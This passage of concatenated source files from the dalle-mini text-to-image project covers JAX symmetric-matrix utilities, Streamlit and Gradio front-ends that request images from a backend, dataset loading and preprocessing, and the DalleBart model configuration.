precision=precision) @functools.partial(jax.jit, static_argnames=("block_size", "axes", "precision")) def sliced_transposed_product( mat, block_size, axes=(-1,), precision=lax.Precision.DEFAULT, ): """Returns the blocked slices representing a symmetric contraction. Specifically, the output is a contraction of the input mat with itself, in the specified axes. Args: mat: The matrix for which we will compute a contraction with itself. block_size: The size of row blocks to compute. axes: Axes to use for the contraction. precision: The precision to use in each computation. Raises: ValueError: Raised when the specified block size does not evenly divide the number of rows of the input mat. """ rank = len(mat.shape) def _make_axis_positive(ax): assert -rank <= ax < rank return ax + rank if ax < 0 else ax positive_axes = [_make_axis_positive(ax) for ax in axes] assert len(positive_axes) == len(axes) remaining_axes = set(range(rank)) - set(positive_axes) assert len(remaining_axes) == 1 remaining_ax = remaining_axes.pop() num_rows = mat.shape[remaining_ax] if num_rows % block_size != 0: raise ValueError( "The row dimension must be divisible by block_size. " f"Instead got row dimension={num_rows} and block_size={block_size}." ) block_rows = [] for i in range(num_rows // block_size): start_indices = [0] * rank start_indices[remaining_ax] = i * block_size slice_sizes = list(mat.shape) slice_sizes[remaining_ax] = block_size slice_sizes_full = list(mat.shape) slice_sizes_full[remaining_ax] = (i + 1) * block_size block_rows.append( product_with_transpose( lax.dynamic_slice( mat, start_indices=start_indices, slice_sizes=slice_sizes ), lax.dynamic_slice( mat, start_indices=[0] * rank, slice_sizes=slice_sizes_full ), axes=(axes, axes), precision=precision, ) ) return SlicedSymmetricMatrix(block_rows=block_rows) @functools.partial(jax.jit, static_argnames=("block_size", "axes", "precision")) def sliced_transposed_product_concat( mat, block_size, axes=(-1,), precision=lax.Precision.DEFAULT, ): """Returns the concatenated slices representing mat*mat^T. 
Args: mat: The matrix for which we will compute mat*mat^T. It does not need to be square, and may be batched. block_size: The size of row blocks to compute. axes: Axes to use for the contraction. precision: The precision to use in each computation. Raises: ValueError: Raised when the specified block size does not evenly divide the number of rows of the input mat. """ sliced_symmetric_matrix = sliced_transposed_product( mat=mat, block_size=block_size, axes=axes, precision=precision ) return jnp.concatenate(sliced_symmetric_matrix.block_rows, axis=-1) @jax.jit def materialize_matrix(symmetric_matrix): """Returns a materialized symmetric matrix. Args: symmetric_matrix: the matrix represented by lower-triangular block slices. """ block_rows = symmetric_matrix.block_rows block_size = block_rows[0].shape[-2] num_blocks = len(block_rows) # Slice the lower-triangular and diagonal blocks into blocks. blocks = [ [ block_row[Ellipsis, i * block_size : (i + 1) * block_size] for i in range(k + 1) ] for k, block_row in enumerate(block_rows) ] # Generate the (off-diagonal) upper-triangular blocks. off_diags = [[] for _ in range(num_blocks - 1)] for k, block_row in enumerate(block_rows[1:]): for i in range(k + 1): off_diags[i].append( jnp.swapaxes( a=block_row[Ellipsis, i * block_size : (i + 1) * block_size], axis1=-1, axis2=-2, ) ) return jnp.block( [row + row_t for row, row_t in zip(blocks[:-1], off_diags)] + [blocks[-1]] ) @functools.partial(jax.jit, static_argnames="num_blocks") def materialize_matrix_from_concat( block_rows_concat, num_blocks=None, ): """Returns a materialized symmetric matrix from concatenated slices. Args: block_rows_concat: The matrix represented as the concatenated lower-triangular blocks. num_blocks: The number of block-rows used to represent the symmetric matrix. If not specified, it is inferred from the shape of block_rows_concat. """ if num_blocks is None: num_blocks = find_num_blocks(block_rows_concat) block_size = block_rows_concat.shape[-2] block_rows = [ block_rows_concat[ Ellipsis, (k * (k + 1)) // 2 * block_size : (((k + 1) * (k + 2)) // 2 + 1) * block_size, ] for k in range(num_blocks) ] return materialize_matrix(SlicedSymmetricMatrix(block_rows=block_rows)) @functools.partial(jax.jit, static_argnames=("alpha", "beta", "axes")) def update_sliced_rows( symmetric_matrix, mat, alpha, beta, axes=(-1,), ): """Implements the blocked equivalent of SYRK. Specifically, the symmetric matrix (represented using lower-triangular block rows) is updated using the sliced product of mat. Args: symmetric_matrix: The symmetric matrix to update. mat: The matrix to use for the update = mat * mat^T. The number of rows should match that of symmetric_matrix. alpha: The weight for the update. beta: The weight for the original symmetric matrix. axes: Axes to use for the contraction of the update. Returns: The updated rows of alpha * mat * mat^T + beta * symmetric_matrix. """ block_size = symmetric_matrix.block_rows[0].shape[-2] sym_prod = sliced_transposed_product(mat=mat, block_size=block_size, axes=axes) return SlicedSymmetricMatrix( block_rows=[ update * alpha + row * beta for update, row in zip(sym_prod.block_rows, symmetric_matrix.block_rows) ] ) def num_blocks_from_total_blocks(total_blocks): """Returns the number of blocks (i.e. block rows) from the total blocks. This is the inverse of the function x -> x*(x+1)/2. For example, the matrix M = [[A, B^T], [B, C]] may be represented using a total of 3 blocks ([A, B, C]). The number of corresponding block rows is 2. 
Args: total_blocks: The total blocks used to represent the matrix. """ num_blocks = np.round((np.sqrt(8 * total_blocks + 1) - 1) / 2).astype(np.int32) if (num_blocks * (num_blocks + 1)) / 2 != total_blocks: raise ValueError( f"total_blocks={total_blocks} does not correspond to " "a symmetric matrix. It must have the form total_blocks = x*(x+1)/2." ) return num_blocks def find_num_blocks(block_rows_concat): """Returns the number of (row) blocks representing the concatenated matrix. For example, an input with dimensions [256, 2560] represents 10 square blocks, which matches 4 lower-triangular block rows (1+2+3+4). So this function will return 4. Use ordinary numpy functions here so that the returned value is static. Args: block_rows_concat: The concatenated block array. Raises: ValueError: When the dimensions of the matrix do not correspond to a lower triangular block representation. """ # Compute the number of square blocks used to represent the matrix. total_blocks = block_rows_concat.shape[-1] / block_rows_concat.shape[-2] # Determine the number of block rows by inverting y = x*(x+1)/2. return num_blocks_from_total_blocks(total_blocks) @functools.partial(jax.jit, static_argnames="block_size") def slice_symmetric_matrix( mat, block_size, ): """Returns sliced row blocks. Args: mat: A symmetric matrix. block_size: The size of the row slices. """ num_rows = mat.shape[-2] num_cols = mat.shape[-1] if num_rows != num_cols: raise ValueError("mat is not square.") if num_rows % block_size != 0: raise ValueError( f"block size does not evenly divide rows. num_rows={num_rows}, block_size={block_size}" ) return SlicedSymmetricMatrix( block_rows=[ mat[ Ellipsis, i * block_size : (i + 1) * block_size, 0 : (i + 1) * block_size, ] for i in range(num_rows // block_size) ] ) @functools.partial(jax.jit, static_argnames="block_size") def slice_symmetric_matrix_concat( mat, block_size, ): """Returns the concatenated sliced row blocks. Args: mat: A symmetric matrix. block_size: The size of the row slices. """ sliced_symmetric_matrix = slice_symmetric_matrix(mat=mat, block_size=block_size) return jnp.concatenate(sliced_symmetric_matrix.block_rows, axis=-1) def sliced_matrix_diag(mat): """Returns the diagonal of the symmetric matrix. Args: mat: The symmetric matrix represented in concatenated block form. """ rows, cols = mat.shape total_blocks = cols // rows num_blocks = num_blocks_from_total_blocks(total_blocks) diags = [] for i in range(num_blocks): last_index = rows * ((i + 2) * (i + 1)) // 2 first_index = last_index - rows diags.append(jnp.diag(mat[Ellipsis, first_index:last_index])) return jnp.concatenate(diags, axis=-1) def diag_as_concat(diag, block_size): """Returns the representation of a diagonal matrix in symmetric block form. Args: diag: The 1D array for the diagonals. block_size: The size of blocks to use. Must divide the length of diag. """ assert len(diag.shape) == 1 # diag must be 1D. assert len(diag) % block_size == 0 num_diag_blocks = len(diag) // block_size blocks = [] for i in range(num_diag_blocks): blocks.append(jnp.zeros(shape=(block_size, block_size * i), dtype=diag.dtype)) blocks.append(jnp.diag(diag[i * block_size : (i + 1) * block_size])) return jnp.concatenate(blocks, axis=-1) def row_abs_maxes(mat): """Returns the max of the absolute values of the rows of the full matrix. For example the symmetric matrix M = [[1, 6], [6, 2]] is represented using mat = [1, 6, 2] with block_size = 1. In this case the function returns the aboslute row maxes of the original symmetric matrix, [6, 6]. 
Args: mat: The symmetric matrix represented as the concatenated blocks. """ rows, cols = mat.shape # Find col and row max for each block. col_maxes = [] row_maxes = [] for i in range(cols // rows): block = jnp.abs(mat[Ellipsis, i * rows : (i + 1) * rows]) col_maxes.append(jnp.max(block, axis=1)) row_maxes.append(jnp.max(block, axis=0)) # global row max from block maxes. num_blocks = num_blocks_from_total_blocks(cols // rows) maxes = [] for i in range(num_blocks): maxes.append( jnp.concatenate( row_maxes[(i * (i + 1) // 2) : ((i + 2) * (i + 1) // 2)] + [ col_maxes[((j + 1) * (j + 2)) // 2 - (j - i + 1)] for j in range(i + 1, num_blocks) ], axis=-1, ) ) return jnp.max(jnp.stack(maxes), axis=0) def times_vector(mat, vec): """Returns the symmetric block-concatenated matrix multiplied by a vector. Specifically, each value in the vector is multiplied by a row of the full matrix. That is, the vector is broadcast and multiplied element-wise. Note this would be the transpose of full_mat * vec if full_mat represented the full symmetric matrix. Args: mat: The symmetric matrix represented as the concatenated blocks. vec: The vector, having the same dimension as the materialized matrix. """ rows, cols = mat.shape num_blocks = num_blocks_from_total_blocks(cols // rows) multiplied = [] for i in range(num_blocks): mat_block = mat[ Ellipsis, rows * ((i + 1) * i) // 2 : rows * ((i + 1) * (i + 2)) // 2 ] vec_block = vec[Ellipsis, rows * i : rows * (i + 1)] multiplied.append(jnp.einsum("...ij,...i->ij", mat_block, vec_block)) return jnp.concatenate(multiplied, axis=-1) File: app/streamlit/backend.py # Client requests to Dalle-Mini Backend server import base64 from io import BytesIO import requests from PIL import Image class ServiceError(Exception): def __init__(self, status_code): self.status_code = status_code def get_images_from_backend(prompt, backend_url): r = requests.post(backend_url, json={"prompt": prompt}) if r.status_code == 200: json = r.json() images = json["images"] images = [Image.open(BytesIO(base64.b64decode(img))) for img in images] version = json.get("version", "unknown") return {"images": images, "version": version} else: raise ServiceError(r.status_code) def get_model_version(url): r = requests.get(url) if r.status_code == 200: version = r.json()["version"] return version else: raise ServiceError(r.status_code) File: app/streamlit/app.py #!/usr/bin/env python # coding: utf-8 import streamlit as st from backend import ServiceError, get_images_from_backend st.sidebar.markdown( """ <style> .aligncenter { text-align: center; } </style> <p class="aligncenter"> <img src="https://raw.githubusercontent.com/borisdayma/dalle-mini/main/img/logo.png"/> </p> """, unsafe_allow_html=True, ) st.sidebar.markdown( """ ___ <p style='text-align: center'> DALL·E mini is an AI model that generates images from any prompt you give! </p> <p style='text-align: center'> Created by Boris Dayma et al. 
2021-2022 <br/> <a href="https://github.com/borisdayma/dalle-mini" target="_blank">GitHub</a> | <a href="https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-mini--Vmlldzo4NjIxODA" target="_blank">Project Report</a> </p> """, unsafe_allow_html=True, ) st.header("DALL·E mini") st.subheader("Generate images from text") prompt = st.text_input("What do you want to see?") DEBUG = False if prompt != "": container = st.empty() container.markdown( f""" <style> p {{ margin:0 }} div {{ margin:0 }} </style> <div data-stale="false" class="element-container css-1e5imcs e1tzin5v1"> <div class="stAlert"> <div role="alert" data-baseweb="notification" class="st-ae st-af st-ag st-ah st-ai st-aj st-ak st-g3 st-am st-b8 st-ao st-ap st-aq st-ar st-as st-at st-au st-av st-aw st-ax st-ay st-az st-b9 st-b1 st-b2 st-b3 st-b4 st-b5 st-b6"> <div class="st-b7"> <div class="css-whx05o e13vu3m50"> <div data-testid="stMarkdownContainer" class="css-1ekf893 e16nr0p30"> <img src="https://raw.githubusercontent.com/borisdayma/dalle-mini/main/app/streamlit/img/loading.gif" width="30"/> Generating predictions for: <b>{prompt}</b> </div> </div> </div> </div> </div> </div> <small><i>Predictions may take up to 5mn under high load. Please stand by.</i></small> """, unsafe_allow_html=True, ) try: backend_url = st.secrets["BACKEND_SERVER"] + "/generate" response = get_images_from_backend(prompt, backend_url) selected = response["images"] version = response["version"] margin = 0.1 # for better position of zoom in arrow n_columns = 3 cols = st.columns([1] + [margin, 1] * (n_columns - 1)) for i, img in enumerate(selected): cols[(i % n_columns) * 2].image(img) container.markdown(f"**{prompt}**") # st.sidebar.markdown( # f"<small><center>{version}</center></small>", unsafe_allow_html=True # ) # st.markdown( # f""" # These results have been obtained using model `{version}` from [an ongoing training run](https://wandb.ai/dalle-mini/dalle-mini/runs/mheh9e55). # """ # ) st.button("Again!", key="again_button") except ServiceError as error: container.text(f"Service unavailable, status: {error.status_code}") except KeyError: if DEBUG: container.markdown( """ **Error: BACKEND_SERVER unset** Please, create a file called `.streamlit/secrets.toml` inside the app's folder and include a line to configure the server URL: ``` BACKEND_SERVER="<server url>" ``` """ ) else: container.markdown( "Error -5, please try again or [report it](mailto:[email protected])." 
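# (added note) Reaching this branch means st.secrets has no BACKEND_SERVER
# entry and DEBUG is False; the DEBUG branch above shows the expected
# .streamlit/secrets.toml setup.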
) File: app/gradio/backend.py # Client requests to Dalle-Mini Backend server import base64 from io import BytesIO import requests from PIL import Image class ServiceError(Exception): def __init__(self, status_code): self.status_code = status_code def get_images_from_backend(prompt, backend_url): r = requests.post(backend_url, json={"prompt": prompt}) if r.status_code == 200: json = r.json() images = json["images"] images = [Image.open(BytesIO(base64.b64decode(img))) for img in images] version = json.get("version", "unknown") return {"images": images, "version": version} else: raise ServiceError(r.status_code) def get_model_version(url): r = requests.get(url) if r.status_code == 200: version = r.json()["version"] return version else: raise ServiceError(r.status_code) File: app/gradio/app.py #!/usr/bin/env python # coding: utf-8 import os import gradio as gr from backend import get_images_from_backend block = gr.Blocks(css=".container { max-width: 800px; margin: auto; }") backend_url = os.environ["BACKEND_SERVER"] + "/generate" def infer(prompt): response = get_images_from_backend(prompt, backend_url) return response["images"] with block: gr.Markdown("<h1><center>DALL·E mini</center></h1>") gr.Markdown( "DALL·E mini is an AI model that generates images from any prompt you give!" ) with gr.Group(): with gr.Box(): with gr.Row().style(mobile_collapse=False, equal_height=True): text = gr.Textbox( label="Enter your prompt", show_label=False, max_lines=1 ).style( border=(True, False, True, True), margin=False, rounded=(True, False, False, True), container=False, ) btn = gr.Button("Run").style( margin=False, rounded=(False, True, True, False), ) gallery = gr.Gallery(label="Generated images", show_label=False).style( grid=[3], height="auto" ) text.submit(infer, inputs=text, outputs=gallery) btn.click(infer, inputs=text, outputs=gallery) gr.Markdown( """___ <p style='text-align: center'> Created by <a href="https://twitter.com/borisdayma" target="_blank">Boris Dayma</a> et al. 
2021-2022 <br/> <a href="https://github.com/borisdayma/dalle-mini" target="_blank">GitHub</a> | <a href="https://wandb.ai/dalle-mini/dalle-mini/reports/DALL-E-mini-Generate-images-from-any-text-prompt--VmlldzoyMDE4NDAy" target="_blank">Project Report</a> </p>""" ) block.launch(enable_queue=False) File: src/dalle_mini/__init__.py __version__ = "0.1.5" from .model import DalleBart, DalleBartProcessor File: src/dalle_mini/data.py import random from dataclasses import dataclass, field from functools import partial from pathlib import Path import jax import jax.numpy as jnp import numpy as np from braceexpand import braceexpand from datasets import Dataset, load_dataset from .model.text import TextNormalizer @dataclass class Dataset: dataset_repo_or_path: str train_file: str = None validation_file: str = None streaming: bool = True use_auth_token: bool = False text_column: str = "caption" encoding_column: str = "encoding" max_train_samples: int = None max_eval_samples: int = None preprocessing_num_workers: int = None overwrite_cache: bool = False do_train: bool = False do_eval: bool = True seed_dataset: int = None shard_by_host: bool = False blank_caption_prob: float = 0.0 clip_score_column: str = "clip_score" min_clip_score: float = None max_clip_score: float = None filter_column: str = None filter_value: str = None multi_eval_ds: bool = False train_dataset: Dataset = field(init=False) eval_dataset: Dataset = field(init=False) other_eval_datasets: list = field(init=False) rng_dataset: jnp.ndarray = field(init=False) multi_hosts: bool = field(init=False) def __post_init__(self): if self.seed_dataset is None: # create a random seed self.seed_dataset = random.randint(0, 2**32 - 1) # set numpy rng self.np_rng = np.random.default_rng(self.seed_dataset) self.multi_hosts = jax.process_count() > 1 # feed blank captions only in streaming mode for now # otherwise dataset could be cached with same blanked captions if self.blank_caption_prob: assert ( self.streaming is True ), "blank_caption_prob can only be used in streaming mode" # define data_files if self.train_file is not None or self.validation_file is not None: # accept braceexpand notation for k in ["train_file", "validation_file"]: f = getattr(self, k) if isinstance(f, str): setattr(self, k, list(braceexpand(f))) # for list of files, split training data shards by host if ( isinstance(self.train_file, list) and self.multi_hosts and self.shard_by_host ): self.train_file = self.train_file[ jax.process_index() :: jax.process_count() ] data_files = { "train": self.train_file, "validation": self.validation_file, } else: data_files = None # multiple validation datasets if self.multi_eval_ds: assert Path( self.dataset_repo_or_path ).is_dir(), f"{self.dataset_repo_or_path} is not a directory, required for multi_eval_ds" data_files = { split.name: [str(f) for f in split.glob("*.parquet")] for split in Path(self.dataset_repo_or_path).glob("*") } # rename "valid" to "validation" if present for consistency if "valid" in data_files: data_files["validation"] = data_files["valid"] del data_files["valid"] self.dataset_repo_or_path = "parquet" # load dataset dataset = load_dataset( self.dataset_repo_or_path, data_files=data_files, streaming=self.streaming, use_auth_token=self.use_auth_token, ) if self.do_train: if "train" not in dataset: raise ValueError("Training requires a training dataset") self.train_dataset = dataset["train"] if self.max_train_samples is not None: self.train_dataset = ( self.train_dataset.take(self.max_train_samples) if self.streaming else 
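# (added note) streaming (iterable) datasets are truncated with take(), while
# map-style datasets are truncated with select() over an index range.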
self.train_dataset.select(range(self.max_train_samples)) ) if self.do_eval: if "validation" not in dataset: raise ValueError("Evaluating requires a validation dataset") self.eval_dataset = dataset["validation"] if self.max_eval_samples is not None: self.eval_dataset = ( self.eval_dataset.take(self.max_eval_samples) if self.streaming else self.eval_dataset.select(range(self.max_eval_samples)) ) # other eval datasets other_eval_splits = dataset.keys() - {"train", "validation"} self.other_eval_datasets = { split: dataset[split] for split in other_eval_splits } def preprocess(self, tokenizer, config): # get required config variables decoder_start_token_id = config.decoder_start_token_id normalize_text = config.normalize_text max_length = config.max_text_length if self.streaming: # we need to shuffle early in streaming mode if hasattr(self, "train_dataset"): self.train_dataset = self.train_dataset.shuffle( buffer_size=5000, seed=self.seed_dataset ) else: self.rng_dataset = jax.random.PRNGKey(self.seed_dataset) # filter data partial_filter_function = partial( filter_function, filter_column=self.filter_column, filter_value=self.filter_value, clip_score_column=self.clip_score_column, min_clip_score=self.min_clip_score, max_clip_score=self.max_clip_score, ) for ds in ["train_dataset", "eval_dataset"]: if hasattr(self, ds): setattr( self, ds, ( getattr(self, ds).filter(partial_filter_function) if self.streaming else getattr(self, ds).filter( partial_filter_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Filtering datasets", ) ), ) if hasattr(self, "other_eval_datasets"): self.other_eval_datasets = { split: ( ds.filter(partial_filter_function) if self.streaming else ds.filter( partial_filter_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Filtering datasets", ) ) for split, ds in self.other_eval_datasets.items() } # normalize text if normalize_text: text_normalizer = TextNormalizer() partial_normalize_function = partial( normalize_function, text_column=self.text_column, text_normalizer=text_normalizer, ) for ds in ["train_dataset", "eval_dataset"]: if hasattr(self, ds): setattr( self, ds, ( getattr(self, ds).map(partial_normalize_function) if self.streaming else getattr(self, ds).map( partial_normalize_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Normalizing datasets", ) ), ) if hasattr(self, "other_eval_datasets"): self.other_eval_datasets = { split: ( ds.map(partial_normalize_function) if self.streaming else ds.map( partial_normalize_function, num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Normalizing datasets", ) ) for split, ds in self.other_eval_datasets.items() } # blank captions if self.blank_caption_prob: partial_blank_caption_function = partial( blank_caption_function, text_column=self.text_column, blank_caption_prob=self.blank_caption_prob, rng=self.np_rng, ) if hasattr(self, "train_dataset"): self.train_dataset = ( self.train_dataset.map(partial_blank_caption_function) if self.streaming else self.train_dataset.map( partial_blank_caption_function, num_proc=None if self.seed_dataset else self.preprocessing_num_workers, load_from_cache_file=False, desc="Blanking some captions", ) ) # preprocess partial_preprocess_function = partial( preprocess_function, tokenizer=tokenizer, text_column=self.text_column, encoding_column=self.encoding_column, max_length=max_length, 
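# (added note) preprocess_function (defined at module level below) tokenizes
# the captions into fixed-length input_ids/attention_mask, copies the image
# encodings into labels, and derives decoder_input_ids via shift_tokens_right.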
decoder_start_token_id=decoder_start_token_id, ) for ds in ["train_dataset", "eval_dataset"]: if hasattr(self, ds): setattr( self, ds, ( getattr(self, ds).map( partial_preprocess_function, batched=True, remove_columns=[ self.text_column, self.encoding_column, ], ) if self.streaming else getattr(self, ds).map( partial_preprocess_function, batched=True, remove_columns=getattr(ds, "column_names"), num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Preprocessing datasets", ) ), ) if hasattr(self, "other_eval_datasets"): self.other_eval_datasets = { split: ( ds.map( partial_preprocess_function, batched=True, remove_columns=[ self.text_column, self.encoding_column, ], ) if self.streaming else ds.map( partial_preprocess_function, batched=True, remove_columns=getattr(ds, "column_names"), num_proc=self.preprocessing_num_workers, load_from_cache_file=not self.overwrite_cache, desc="Preprocessing datasets", ) ) for split, ds in self.other_eval_datasets.items() } def dataloader(self, split, batch_size, epoch=None): def _dataloader_datasets_non_streaming( dataset: Dataset, rng: jax.random.PRNGKey = None, ): """ Returns batches of size `batch_size` from truncated `dataset`, sharded over all local devices. Shuffle batches if rng is set. """ steps_per_epoch = len(dataset) // batch_size if rng is not None: batch_idx = jax.random.permutation(rng, len(dataset)) else: batch_idx = jnp.arange(len(dataset)) batch_idx = batch_idx[ : steps_per_epoch * batch_size ] # Skip incomplete batch. batch_idx = batch_idx.reshape((steps_per_epoch, batch_size)) for idx in batch_idx: batch = dataset[idx] batch = {k: jnp.array(v) for k, v in batch.items()} yield batch def _dataloader_datasets_streaming( dataset: Dataset, epoch: int, ): keys = ["input_ids", "attention_mask", "labels", "decoder_input_ids"] batch = {k: [] for k in keys} first_loop = True # stop after one loop in some cases while (self.multi_hosts and split == "train") or first_loop: # in multi-host, we run forever (no epoch) as hosts need to stop # at the same time and training data may not be split equally # For validation data we put the entire batch on each host and then # keep only the one specific to each host (could be improved but not necessary) if epoch is not None: assert split == "train" # reshuffle training data at each epoch dataset.set_epoch(epoch) epoch += 1 for item in dataset: for k in keys: batch[k].append(item[k]) if len(batch[keys[0]]) == batch_size: batch = {k: jnp.array(v) for k, v in batch.items()} yield batch batch = {k: [] for k in keys} first_loop = False if split == "train": ds = self.train_dataset elif split == "eval": ds = self.eval_dataset else: ds = self.other_eval_datasets[split] if self.streaming: return _dataloader_datasets_streaming(ds, epoch) else: if split == "train": self.rng_dataset, input_rng = jax.random.split(self.rng_dataset) return _dataloader_datasets_non_streaming(ds, input_rng) @property def length(self): len_train_dataset, len_eval_dataset = None, None if self.streaming: # we don't know the length, let's just assume max_samples if defined if self.max_train_samples is not None: len_train_dataset = self.max_train_samples if self.max_eval_samples is not None: len_eval_dataset = self.max_eval_samples else: len_train_dataset = ( len(self.train_dataset) if hasattr(self, "train_dataset") else None ) len_eval_dataset = ( len(self.eval_dataset) if hasattr(self, "eval_dataset") else None ) return len_train_dataset, len_eval_dataset def shift_tokens_right(input_ids: np.array, 
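# (added) worked example, assuming integer token ids:
#   shift_tokens_right(np.array([[5, 6, 7]]), 0) -> array([[0., 5., 6.]])
# (float output because np.zeros defaults to float64)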
decoder_start_token_id: int): """ Shift input ids one token to the right. """ shifted_input_ids = np.zeros(input_ids.shape) shifted_input_ids[:, 1:] = input_ids[:, :-1] shifted_input_ids[:, 0] = decoder_start_token_id return shifted_input_ids def blank_caption_function(example, text_column, blank_caption_prob, rng=None): if ( blank_caption_prob and (rng.random() if rng is not None else np.random.random()) < blank_caption_prob ): example[text_column] = "" return example def normalize_function(example, text_column, text_normalizer): example[text_column] = text_normalizer(example[text_column]) return example def filter_function( example, min_clip_score, max_clip_score, clip_score_column, filter_column, filter_value, ): if min_clip_score is not None and example[clip_score_column] < min_clip_score: return False if max_clip_score is not None and example[clip_score_column] > max_clip_score: return False if filter_column is not None and example[filter_column] != filter_value: return False return True def preprocess_function( examples, tokenizer, text_column, encoding_column, max_length, decoder_start_token_id, ): inputs = examples[text_column] # Setting padding="max_length" as we need fixed length inputs for jitted functions model_inputs = tokenizer( inputs, max_length=max_length, padding="max_length", truncation=True, return_tensors="np", ) # set up targets # Note: labels correspond to our target indices # decoder input ids are the same but shifted to the right with bos at the beginning (and without last token) labels = examples[encoding_column] labels = np.asarray(labels) # We need the labels, in addition to the decoder_input_ids, for the compute_loss function model_inputs["labels"] = labels # In our case, this prepends the bos token and removes the last one decoder_input_ids = shift_tokens_right(labels, decoder_start_token_id) model_inputs["decoder_input_ids"] = decoder_input_ids return model_inputs File: src/dalle_mini/model/configuration.py # coding=utf-8 # Copyright 2021 The Fairseq Authors and The HuggingFace Inc. team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
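# (added) Illustrative only -- with the defaults declared below, a base config
# can be built as e.g. DalleBartConfig(image_vocab_size=16384,
# image_length=256, d_model=1024); any extra keyword argument is forwarded to
# the underlying PretrainedConfig.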
""" DalleBart model configuration """ import warnings from transformers.configuration_utils import PretrainedConfig from transformers.utils import logging from .utils import PretrainedFromWandbMixin logger = logging.get_logger(__name__) class DalleBartConfig(PretrainedFromWandbMixin, PretrainedConfig): model_type = "dallebart" keys_to_ignore_at_inference = ["past_key_values"] attribute_map = { "num_attention_heads": "encoder_attention_heads", "hidden_size": "d_model", } def __init__( self, normalize_text=False, encoder_vocab_size=50264, image_vocab_size=16384, # encoded image token space image_length=256, # number of encoded tokens max_text_length=64, # max number of text tokens encoder_layers=12, encoder_ffn_dim=4096, encoder_attention_heads=16, decoder_layers=12, decoder_ffn_dim=4096, decoder_attention_heads=16, activation_function="gelu", d_model=1024, dropout=0.1, attention_dropout=0.0, activation_dropout=0.0, init_std=0.02, scale_embedding=False, gradient_checkpointing=True, use_scan=None, use_cache=True, is_encoder_decoder=True, forced_eos_token_id=None, tie_word_embeddings=False, # different modalities and sizes do_sample=True, # transformer variants use_bias=False, # use bias in attention and dense layers (except for lm_head) ln_type="layernorm", # layer normalization type, "rmsnorm", "layernorm" ln_positions="normformer", # layer normalization positions, "normformer", "swinv2", "cogview", "postln", "preln", "deepnet" (same as postln), "subln" use_head_scale=False, # used in NormFormer use_cosine_attention=False, # used in Swin v2 tau_init=0.05, # used only in cosine attention (Swin v2) use_absolute_position_embeddings=True, # default use_swin_position_embeddings=False, # used in Swin v1/v2 use_deepnet_scaling=False, # used in Deepnet use_subln_init=False, use_glu=True, # "GLU Variants Improve Transformer" use_alibi=False, # Not implemented yet - from "Train Short, Test Long: Attention with Linear Biases Enables Input Length Extrapolation" sinkhorn_iters=1, # used in SinkFormers use_final_ln_encoder=True, # final layer normalization in encoder use_final_ln_decoder=True, # final layer normalization in decoder # parameters that should not be necessary but could affect results force_ln_scale=False, # force scale in layernorm even when followed by dense layers **kwargs, ): # text normalizer self.normalize_text = normalize_text # transformer variants self.use_bias = use_bias assert ln_type in [ "rmsnorm", "layernorm", ], "ln_type must be 'rmsnorm' or 'layernorm'" self.ln_type = ln_type if ln_positions == "deepnet": ln_positions = "postln" assert ln_positions in [ "normformer", "swinv2", "cogview", "postln", "preln", "subln", ], "ln_positions must be 'normformer', 'swinv2', 'cogview', 'postln', 'preln', 'subln'" self.use_head_scale = use_head_scale assert use_alibi is False, "use_alibi is not supported yet" self.ln_positions = ln_positions self.use_cosine_attention = use_cosine_attention self.tau_init = tau_init self.use_absolute_position_embeddings = use_absolute_position_embeddings self.use_swin_position_embeddings = use_swin_position_embeddings self.use_deepnet_scaling = use_deepnet_scaling self.use_subln_init = use_subln_init self.use_glu = use_glu self.use_alibi = use_alibi self.sinkhorn_iters = sinkhorn_iters if ln_positions == "postln": assert ( use_final_ln_encoder ), "use_final_ln_encoder must be True when ln_positions is 'postln'" assert ( use_final_ln_decoder ), "use_final_ln_decoder must be True when ln_positions is 'postln'" self.use_final_ln_encoder = use_final_ln_encoder 
self.use_final_ln_decoder = use_final_ln_decoder self.force_ln_scale = force_ln_scale # common parameters self.encoder_vocab_size = encoder_vocab_size self.image_vocab_size = image_vocab_size self.image_length = image_length self.max_text_length = max_text_length self.d_model = d_model self.encoder_ffn_dim = encoder_ffn_dim self.encoder_layers = encoder_layers self.encoder_attention_heads = encoder_attention_heads self.decoder_ffn_dim = decoder_ffn_dim self.decoder_layers = decoder_layers self.decoder_attention_heads = decoder_attention_heads self.dropout = dropout self.attention_dropout = attention_dropout self.activation_dropout = activation_dropout self.activation_function = activation_function self.init_std = init_std self.use_cache = use_cache self.gradient_checkpointing = gradient_checkpointing # all layers are the same in most configurations self.use_scan = use_scan if use_scan is not None else ln_positions != "swinv2" assert not ( self.use_scan and ln_positions == "swinv2" ), "scan cannot be used with 'swinv2'" self.scale_embedding = ( scale_embedding # scale factor will be sqrt(d_model) if True ) # special token id's are appended to vocab if not provided decoder_start_token_id = kwargs.pop("decoder_start_token_id", image_vocab_size) bos_token_id = kwargs.pop("bos_token_id", image_vocab_size) pad_token_id = kwargs.pop("pad_token_id", image_vocab_size) eos_token_id = kwargs.pop("eos_token_id", image_vocab_size) # we generate to image_length + 1 (for bos) by default min_length = kwargs.pop("min_length", image_length + 1) max_length = kwargs.pop("max_length", image_length + 1) super().__init__( # args required in parent class is_encoder_decoder=is_encoder_decoder, tie_word_embeddings=tie_word_embeddings, forced_eos_token_id=forced_eos_token_id, decoder_start_token_id=decoder_start_token_id, bos_token_id=bos_token_id, pad_token_id=pad_token_id, eos_token_id=eos_token_id, min_length=min_length, max_length=max_length, do_sample=do_sample, **kwargs, ) # ensure backward compatibility for BART CNN models if self.forced_bos_token_id is None and kwargs.get( "force_bos_token_to_be_generated", False ): self.forced_bos_token_id = self.bos_token_id warnings.warn( f"Please make sure the config includes `forced_bos_token_id={self.bos_token_id}` in future versions." "The config can simply be saved and uploaded again to be fixed." 
